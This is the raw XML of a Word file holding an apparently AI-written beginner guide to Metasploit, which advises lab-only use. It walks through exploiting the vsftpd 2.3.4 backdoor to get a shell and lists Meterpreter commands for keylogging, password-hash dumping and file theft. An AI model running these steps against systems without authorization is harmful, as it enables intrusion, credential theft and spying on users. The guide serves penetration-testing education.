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I’ll give you a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clean, structured walkthrough of Metasploit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, but with an important constraint: this is for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environments only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(your own lab, your own systems, or explicit permission). Using it on live systems without authorization is illegal and easily traceable.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Metasploit Actually Is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Metasploit Framework is not “a hacking tool” in the simplistic sense. It’s a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modular exploitation framework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used for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Vulnerability validation (not just scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Exploit development/testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Post-exploitation analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Red teaming simulation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weaponized testing environment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>, not a scanner.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(Understand This or You’ll Be Useless)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Metasploit operates around 4 core module types:</w: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A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Exploits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Code that targets a specific vulnerability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br/>
        <w:t>Example: exploiting an outdated service</w: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A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Payloads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What runs after exploitation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br/>
        <w:t>Two main categories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Singles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→ one-shot (just run command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Staged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→ loader + larger payload (e.g., Meterpreter)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A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Auxiliary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Non-exploit modules:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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lastRenderedPageBreak/>
        <w:t>Brute-force tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Enumeration scripts</w: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DA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Post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Used after access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Data extraction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Persistence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Setup (Minimal)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you're on Linux (recommended):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sudo apt update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sudo apt install metasploit-framework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msfconsole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using Windows, it’s slower and less stable—don’t.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First Run (msfconsole)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msfconsole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You’ll see the console load modules.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Useful commands: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help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search &lt;keyword&gt;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use &lt;module&gt;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info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show options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set &lt;option&gt; &lt;value&gt;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run / exploit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Basic Workflow (This is the Real Skill)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1: Find a Target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Use scanners (NOT Metasploit initially):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Nmap (preferred)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nmap -sV &lt;target_ip&gt;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Search Exploit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Inside Metasploit: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search &lt;service_name&gt;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search vsftpd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Select Module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use exploit/unix/ftp/vsftpd_234_backdoor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Configure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show options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set RHOSTS &lt;target_ip&gt;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set LHOST &lt;your_ip&gt;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Choose Payload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show payloads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set PAYLOAD cmd/unix/interact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DA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 6: Run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exploit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successful → you get a shell.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Meterpreter (What Actually Matters)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Meterpreter is the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real power tool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Once you get it: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sysinfo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getuid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ls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pwd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download &lt;file&gt;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upload &lt;file&gt;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Advanced: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shell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keyscan_start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screenshot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hashdump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This is where most beginners fail—they don’t go beyond “exploit worked.”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Post-Exploitation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After access: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background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use post/multi/recon/local_exploit_suggester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set SESSION &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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2DA6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>run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This suggests privilege escalation paths.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Build a Proper Lab (Non-negotiable)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you skip this, you’re just guessing.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32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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VirtualBox or VMware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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lastRenderedPageBreak/>
        <w:t>Attacker: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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OWASP Juice Shop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Brutal Reality Check (What Most People Get Wrong)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Metasploit is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not magic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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90% of real systems are patched → exploits fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Real work = enumeration, misconfigurations, chaining weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Script kiddies rely only on </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32DA6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit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→ they hit a wall fast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your plan is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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“scan → exploit → done”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That collapses immediately in real environments.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What You Should Learn Next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you’re serious:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Networking fundamentals (TCP/IP deeply)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Linux internals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Web vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Auth bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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Privilege escalation (critical skill)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Manual exploitation (Metasploit is optional, not required)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Bottom Line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Metasploit is a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force multiplier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>, not a starting point.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lastRenderedPageBreak/>
        <w:t>If you don’t understand:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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how the vulnerability works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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what the payload is doing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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how access is maintained</w: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…then you’re just pressing buttons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E3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32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32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E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Walk you through a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full attack chain in a lab (step-by-step)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32DA6" w:rsidRPr="00E32DA6" w:rsidRDefault="00E32DA6" w:rsidP="00E32D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Or show you how to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32DA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Metasploit into testing your Lumina site properly</w:t>
      </w:r>
      <w:r w:rsidRPr="00E32DA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> without doing anything illegal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF01C3" w:rsidRDefault="00E32DA6">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00BF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44B83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A5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31CF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C8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546D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B47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776F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8F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A6F8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3762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42799"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84A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A587A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="263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24765"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="557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05FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69E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12197"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0A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DA6"/>
    <w:rsid w:val="0047182F"/>
    <w:rsid w:val="0051590E"/>
    <w:rsid w:val="00E3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9F44D-DB42-4274-9BA3-ACEAA0E1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2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2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2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2D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2D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D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D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2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2026-03-24T16:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T16:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>